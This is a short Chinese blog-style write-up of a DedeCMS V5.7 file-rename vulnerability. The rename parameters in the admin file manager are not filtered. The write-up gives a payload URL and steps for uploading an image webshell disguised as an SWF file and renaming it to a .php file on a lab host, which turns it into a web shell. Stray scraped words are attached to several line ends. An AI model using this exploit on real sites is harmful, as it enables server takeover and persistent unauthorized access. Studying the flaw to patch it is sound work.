0x01 漏洞分析
漏洞文件: dede/file_manage_control.php ,$fmdo 开始时赋值,因此咱们能够使fmdo=rename ,使其进入 if语句 ,调用 FileManagement 对象的 RenameFile 方法,跟进 RenameFile 方法。php
关于这里的$fmdo变量,咱们能够找找这个变量怎么来的函数
Ok那这里知道这个$fmdo变量是能够咱们传递控制获得。url
那咱们跟进这个RenameFile函数spa
RenameFile函数位于/dede/file_class.php:code
看到 $oldname 和 $newname 直接拼接生成,没有对文件名进行过滤,直接致使漏洞发生。因此最终payload为:对象
/dede/file_manage_control.php?fmdo=rename&oldfilename=你上传文件的路径&newfilename=你想写的路径
0x02 漏洞利用
登陆后台后 能够上传一个图片马blog
这里能够看到上传的swf文件路径,接下来构造url更名,使其变为php后缀马图片
访问:class
http://192.168.5.149/DedeCMS-V5.7/uploads/dede/file_manage_control.php?fmdo=rename&oldfilename=/DedeCMS-V5.7/uploads/uploads/media/190511/1_1555226071.SWF&newfilename=/secquan.php
显示上传成功登录